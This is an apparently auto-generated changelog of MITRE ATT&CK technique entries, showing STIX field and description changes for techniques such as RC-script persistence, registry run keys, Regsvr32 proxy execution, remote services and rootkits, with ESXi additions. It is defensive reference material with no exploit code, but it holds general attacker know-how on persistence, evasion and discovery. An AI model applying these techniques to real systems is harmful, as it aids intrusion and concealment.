| m services at startup for different run levels. RC scripts r | | om services at startup for different run levels. RC scripts |
| equire root privileges to modify. Adversaries can establish | | require root privileges to modify. Adversaries may establis |
| persistence by adding a malicious binary path or shell comm | | h persistence by adding a malicious binary path or shell com |
| ands to <code>rc.local</code>, <code>rc.common</code>, and o | | mands to <code>rc.local</code>, <code>rc.common</code>, and |
| ther RC scripts specific to the Unix-like distribution.(Cita | | other RC scripts specific to the Unix-like distribution.(Cit |
| tion: IranThreats Kittens Dec 2017)(Citation: Intezer Hidden | | ation: IranThreats Kittens Dec 2017)(Citation: Intezer Hidde |
| Wasp Map 2019) Upon reboot, the system executes the script's | | nWasp Map 2019) Upon reboot, the system executes the script' |
| contents as root, resulting in persistence. Adversary abus | | s contents as root, resulting in persistence. Adversary abu |
| e of RC scripts is especially effective for lightweight Unix | | se of RC scripts is especially effective for lightweight Uni |
| -like distributions using the root user as default, such as | | x-like distributions using the root user as default, such as |
| IoT or embedded systems.(Citation: intezer-kaiji-malware) S | | ESXi hypervisors, IoT, or embedded systems.(Citation: intez |
| everal Unix-like systems have moved to Systemd and deprecate | | er-kaiji-malware) As ESXi servers store most system files in |
| d the use of RC scripts. This is now a deprecated mechanism | | memory and therefore discard changes on shutdown, leveragin |
| in macOS in favor of [Launchd](https://attack.mitre.org/tech | | g `/etc/rc.local.d/local.sh` is one of the few mechanisms fo |
| niques/T1053/004). (Citation: Apple Developer Doco Archive L | | r enabling persistence across reboots.(Citation: Juniper Net |
| aunchd)(Citation: Startup Items) This technique can be used | | works ESXi Backdoor 2022) Several Unix-like systems have mo |
| on Mac OS X Panther v10.3 and earlier versions which still e | | ved to Systemd and deprecated the use of RC scripts. This is |
| xecute the RC scripts.(Citation: Methods of Mac Malware Pers | | now a deprecated mechanism in macOS in favor of [Launchd](h |
| istence) To maintain backwards compatibility some systems, s | | ttps://attack.mitre.org/techniques/T1053/004).(Citation: App |
| uch as Ubuntu, will execute the RC scripts if they exist wit | | le Developer Doco Archive Launchd)(Citation: Startup Items) |
| h the correct file permissions.(Citation: Ubuntu Manpage sys | | This technique can be used on Mac OS X Panther v10.3 and ear |
| temd rc) | | lier versions which still execute the RC scripts.(Citation: |
| | | Methods of Mac Malware Persistence) To maintain backwards co |
| | | mpatibility some systems, such as Ubuntu, will execute the R |
| | | C scripts if they exist with the correct file permissions.(C |
| | | itation: Ubuntu Manpage systemd rc) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['root'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:22:29.150000+00:00 | 2025-04-15 19:59:13.566000+00:00 |
| description | Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) | Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries may establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as ESXi hypervisors, IoT, or embedded systems.(Citation: intezer-kaiji-malware) As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.(Citation: Juniper Networks ESXi Backdoor 2022)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004).(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc) |
| x_mitre_version | 2.1 | 2.2 |
| x_mitre_platforms[2] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Juniper Networks ESXi Backdoor 2022', 'description': 'Asher Langton. (2022, December 9). A Custom Python Backdoor for VMWare ESXi Servers. Retrieved March 26, 2025.', 'url': 'https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers'} |
| x_mitre_platforms | | ESXi |
[T1542.004] Pre-OS Boot: ROMMONkit
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-22 02:18:19.568000+00:00 | 2025-04-15 19:58:55.910000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1547.007] Boot or Logon Autostart Execution: Re-opened Applications
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 23:46:56.443000+00:00 | 2025-04-16 20:37:22.343000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1600.001] Weaken Encryption: Reduce Key Space
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-21 22:36:22.369000+00:00 | 2025-04-15 19:58:23.689000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1620] Reflective Code Loading
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-09 18:49:08.428000+00:00 | 2025-04-15 19:58:27.959000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:27:58.051000+00:00 | 2025-04-15 19:58:54.099000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[T1218.009] System Binary Proxy Execution: Regsvcs/Regasm
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-11 18:55:48.725000+00:00 | 2025-04-15 19:59:05.911000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[T1218.010] System Binary Proxy Execution: Regsvr32
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Anti-virus', 'Application control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 12:24:56.148000+00:00 | 2025-04-16 20:37:19.846000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 2.1 | 2.2 |
[T1070.010] Indicator Removal: Relocate Malware
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Once a payload is delivered, adversaries may reproduce copie | t | Once a payload is delivered, adversaries may reproduce copie |
| s of the same malware on the victim system to remove evidenc | | s of the same malware on the victim system to remove evidenc |
| e of their presence and/or avoid defenses. Copying malware p | | e of their presence and/or avoid defenses. Copying malware p |
| ayloads to new locations may also be combined with [File Del | | ayloads to new locations may also be combined with [File Del |
| etion](https://attack.mitre.org/techniques/T1070/004) to cle | | etion](https://attack.mitre.org/techniques/T1070/004) to cle |
| anup older artifacts. Relocating malware may be a part of m | | anup older artifacts. Relocating malware may be a part of m |
| any actions intended to evade defenses. For example, adversa | | any actions intended to evade defenses. For example, adversa |
| ries may copy and rename payloads to better blend into the l | | ries may copy and rename payloads to better blend into the l |
| ocal environment (i.e., [Match Legitimate Name or Location]( | | ocal environment (i.e., [Match Legitimate Resource Name or L |
| https://attack.mitre.org/techniques/T1036/005)).(Citation: D | | ocation](https://attack.mitre.org/techniques/T1036/005)).(Ci |
| FIR Report Trickbot June 2023) Payloads may also be repositi | | tation: DFIR Report Trickbot June 2023) Payloads may also be |
| oned to target [File/Path Exclusions](https://attack.mitre.o | | repositioned to target [File/Path Exclusions](https://attac |
| rg/techniques/T1564/012) as well as specific locations assoc | | k.mitre.org/techniques/T1564/012) as well as specific locati |
| iated with establishing [Persistence](https://attack.mitre.o | | ons associated with establishing [Persistence](https://attac |
| rg/tactics/TA0003).(Citation: Latrodectus APR 2024) Relocat | | k.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024) |
| ing malicious payloads may also hinder defensive analysis, e | | Relocating malicious payloads may also hinder defensive an |
| specially to separate these payloads from earlier events (su | | alysis, especially to separate these payloads from earlier e |
| ch as [User Execution](https://attack.mitre.org/techniques/T | | vents (such as [User Execution](https://attack.mitre.org/tec |
| 1204) and [Phishing](https://attack.mitre.org/techniques/T15 | | hniques/T1204) and [Phishing](https://attack.mitre.org/techn |
| 66)) that may have generated alerts or otherwise drawn atten | | iques/T1566)) that may have generated alerts or otherwise dr |
| tion from defenders. | | awn attention from defenders. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-13 15:48:46.391000+00:00 | 2025-04-15 19:59:08.329000+00:00 |
| description | Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders. | Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1074.002] Data Staged: Remote Data Staging
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-30 13:28:37.414000+00:00 | 2025-04-15 19:58:21.613000+00:00 |
| external_references[1]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1021.001] Remote Services: Remote Desktop Protocol
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['RDP service enabled, account in the Remote Desktop Users group'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-07 14:23:30.265000+00:00 | 2025-04-15 19:59:18.689000+00:00 |
| external_references[1]['description'] | Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014. | Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 17, 2024. |
| external_references[1]['url'] | http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/ | https://web.archive.org/web/20191115195333/https://www.crowdstrike.com/blog/adversary-tricks-crowdstrike-treats/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1021] Remote Services
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
|---|
| t | Adversaries may use [Valid Accounts](https://attack.mitre.or | t | Adversaries may use [Valid Accounts](https://attack.mitre.or |
| g/techniques/T1078) to log into a service that accepts remot | | g/techniques/T1078) to log into a service that accepts remot |
| e connections, such as telnet, SSH, and VNC. The adversary m | | e connections, such as telnet, SSH, and VNC. The adversary m |
| ay then perform actions as the logged-on user. In an enterp | | ay then perform actions as the logged-on user. In an enterp |
| rise environment, servers and workstations can be organized | | rise environment, servers and workstations can be organized |
| into domains. Domains provide centralized identity managemen | | into domains. Domains provide centralized identity managemen |
| t, allowing users to login using one set of credentials acro | | t, allowing users to login using one set of credentials acro |
| ss the entire network. If an adversary is able to obtain a s | | ss the entire network. If an adversary is able to obtain a s |
| et of valid domain credentials, they could login to many dif | | et of valid domain credentials, they could login to many dif |
| ferent machines using remote access protocols such as secure | | ferent machines using remote access protocols such as secure |
| shell (SSH) or remote desktop protocol (RDP).(Citation: SSH | | shell (SSH) or remote desktop protocol (RDP).(Citation: SSH |
| Secure Shell)(Citation: TechNet Remote Desktop Services) Th | | Secure Shell)(Citation: TechNet Remote Desktop Services) Th |
| ey could also login to accessible SaaS or IaaS services, suc | | ey could also login to accessible SaaS or IaaS services, suc |
| h as those that federate their identities to the domain. L | | h as those that federate their identities to the domain, or |
| egitimate applications (such as [Software Deployment Tools]( | | management platforms for internal virtualization environment |
| https://attack.mitre.org/techniques/T1072) and other adminis | | s such as VMware vCenter. Legitimate applications (such as |
| trative programs) may utilize [Remote Services](https://atta | | [Software Deployment Tools](https://attack.mitre.org/techni |
| ck.mitre.org/techniques/T1021) to access remote hosts. For e | | ques/T1072) and other administrative programs) may utilize [ |
| xample, Apple Remote Desktop (ARD) on macOS is native softwa | | Remote Services](https://attack.mitre.org/techniques/T1021) |
| re used for remote management. ARD leverages a blend of prot | | to access remote hosts. For example, Apple Remote Desktop (A |
| ocols, including [VNC](https://attack.mitre.org/techniques/T | | RD) on macOS is native software used for remote management. |
| 1021/005) to send the screen and control buffers and [SSH](h | | ARD leverages a blend of protocols, including [VNC](https:// |
| ttps://attack.mitre.org/techniques/T1021/004) for secure fil | | attack.mitre.org/techniques/T1021/005) to send the screen an |
| e transfer.(Citation: Remote Management MDM macOS)(Citation: | | d control buffers and [SSH](https://attack.mitre.org/techniq |
| Kickstart Apple Remote Desktop commands)(Citation: Apple Re | | ues/T1021/004) for secure file transfer.(Citation: Remote Ma |
| mote Desktop Admin Guide 3.3) Adversaries can abuse applicat | | nagement MDM macOS)(Citation: Kickstart Apple Remote Desktop |
| ions such as ARD to gain remote code execution and perform l | | commands)(Citation: Apple Remote Desktop Admin Guide 3.3) A |
| ateral movement. In versions of macOS prior to 10.14, an adv | | dversaries can abuse applications such as ARD to gain remote |
| ersary can escalate an SSH session to an ARD session which e | | code execution and perform lateral movement. In versions of |
| nables an adversary to accept TCC (Transparency, Consent, an | | macOS prior to 10.14, an adversary can escalate an SSH sess |
| d Control) prompts without user interaction and gain access | | ion to an ARD session which enables an adversary to accept T |
| to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citati | | CC (Transparency, Consent, and Control) prompts without user |
| on: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desk | | interaction and gain access to data.(Citation: FireEye 2019 |
| top commands) | | Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation |
| | | : Kickstart Apple Remote Desktop commands) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Active remote service accepting connections and valid credentials'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-01 15:35:38.299000+00:00 | 2025-04-15 19:58:32.234000+00:00 |
| description | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain.
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands) | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain, or management platforms for internal virtualization environments such as VMware vCenter.
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands) |
| x_mitre_version | 1.5 | 1.6 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1018] Remote System Discovery
Current version: 3.6
Version changed from: 3.5 → 3.6
|
|
|---|
| t | Adversaries may attempt to get a listing of other systems by | t | Adversaries may attempt to get a listing of other systems by |
| IP address, hostname, or other logical identifier on a netw | | IP address, hostname, or other logical identifier on a netw |
| ork that may be used for Lateral Movement from the current s | | ork that may be used for Lateral Movement from the current s |
| ystem. Functionality could exist within remote access tools | | ystem. Functionality could exist within remote access tools |
| to enable this, but utilities available on the operating sys | | to enable this, but utilities available on the operating sys |
| tem could also be used such as [Ping](https://attack.mitre. | | tem could also be used such as [Ping](https://attack.mitre. |
| org/software/S0097) or <code>net view</code> using [Net](htt | | org/software/S0097), <code>net view</code> using [Net](https |
| ps://attack.mitre.org/software/S0039). Adversaries may also | | ://attack.mitre.org/software/S0039), or, on ESXi servers, `e |
| analyze data from local host files (ex: <code>C:\Windows\Sy | | sxcli network diag ping`. Adversaries may also analyze data |
| stem32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) | | from local host files (ex: <code>C:\Windows\System32\Driver |
| or other passive means (such as local [Arp](https://attack.m | | s\etc\hosts</code> or <code>/etc/hosts</code>) or other pass |
| itre.org/software/S0099) cache entries) in order to discover | | ive means (such as local [Arp](https://attack.mitre.org/soft |
| the presence of remote systems in an environment. Adversar | | ware/S0099) cache entries) in order to discover the presence |
| ies may also target discovery of network infrastructure as w | | of remote systems in an environment. Adversaries may also |
| ell as leverage [Network Device CLI](https://attack.mitre.or | | target discovery of network infrastructure as well as levera |
| g/techniques/T1059/008) commands on network devices to gathe | | ge [Network Device CLI](https://attack.mitre.org/techniques/ |
| r detailed information about systems within a network (e.g. | | T1059/008) commands on network devices to gather detailed in |
| <code>show cdp neighbors</code>, <code>show arp</code>).(Cit | | formation about systems within a network (e.g. <code>show cd |
| ation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS | | p neighbors</code>, <code>show arp</code>).(Citation: US-CER |
| May 2021) | | T-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 19:08:59.741000+00:00 | 2025-04-15 19:59:15.859000+00:00 |
| description | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
| Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097), net view using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
|
| external_references[2]['description'] | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql | https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 3.5 | 3.6 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1091] Replication Through Removable Media
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Removable media allowed, Autorun enabled or vulnerability present that allows for code execution'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-17 20:42:21.453000+00:00 | 2025-04-15 19:58:24.231000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1564.009] Hide Artifacts: Resource Forking
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Notarization', 'Gatekeeper'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-05 05:10:23.890000+00:00 | 2025-04-16 20:37:19.185000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1578.004] Modify Cloud Compute Infrastructure: Revert Cloud Instance
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-03-08 10:33:02.128000+00:00 | 2025-04-15 19:58:03.446000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1207] Rogue Domain Controller
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Log analysis'] | |
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-08 21:20:04.850000+00:00 | 2025-04-15 19:58:32.959000+00:00 |
| x_mitre_version | 2.1 | 2.2 |
[T1014] Rootkit
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'File Monitoring', 'Host Intrusion Prevention Systems', 'Application Control', 'Signature-based Detection', 'System Access Controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:50.568000+00:00 | 2025-04-16 20:37:15.308000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1564.006] Hide Artifacts: Run Virtual Instance
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may carry out malicious operations using a virtu | t | Adversaries may carry out malicious operations using a virtu |
| al instance to avoid detection. A wide variety of virtualiza | | al instance to avoid detection. A wide variety of virtualiza |
| tion technologies exist that allow for the emulation of a co | | tion technologies exist that allow for the emulation of a co |
| mputer or computing environment. By running malicious code i | | mputer or computing environment. By running malicious code i |
| nside of a virtual instance, adversaries can hide artifacts | | nside of a virtual instance, adversaries can hide artifacts |
| associated with their behavior from security tools that are | | associated with their behavior from security tools that are |
| unable to monitor activity inside the virtual instance. Addi | | unable to monitor activity inside the virtual instance.(Cita |
| tionally, depending on the virtual networking implementation | | tion: CyberCX Akira Ransomware) Additionally, depending on t |
| (ex: bridged adapter), network traffic generated by the vir | | he virtual networking implementation (ex: bridged adapter), |
| tual instance can be difficult to trace back to the compromi | | network traffic generated by the virtual instance can be dif |
| sed host as the IP address and hostname might not match know | | ficult to trace back to the compromised host as the IP addre |
| n values.(Citation: SingHealth Breach Jan 2019) Adversaries | | ss and hostname might not match known values.(Citation: Sing |
| may utilize native support for virtualization (ex: Hyper-V) | | Health Breach Jan 2019) Adversaries may utilize native supp |
| or drop the necessary files to run a virtual instance (ex: | | ort for virtualization (ex: Hyper-V) or drop the necessary f |
| VirtualBox binaries). After running a virtual instance, adve | | iles to run a virtual instance (ex: VirtualBox binaries). Af |
| rsaries may create a shared folder between the guest and hos | | ter running a virtual instance, adversaries may create a sha |
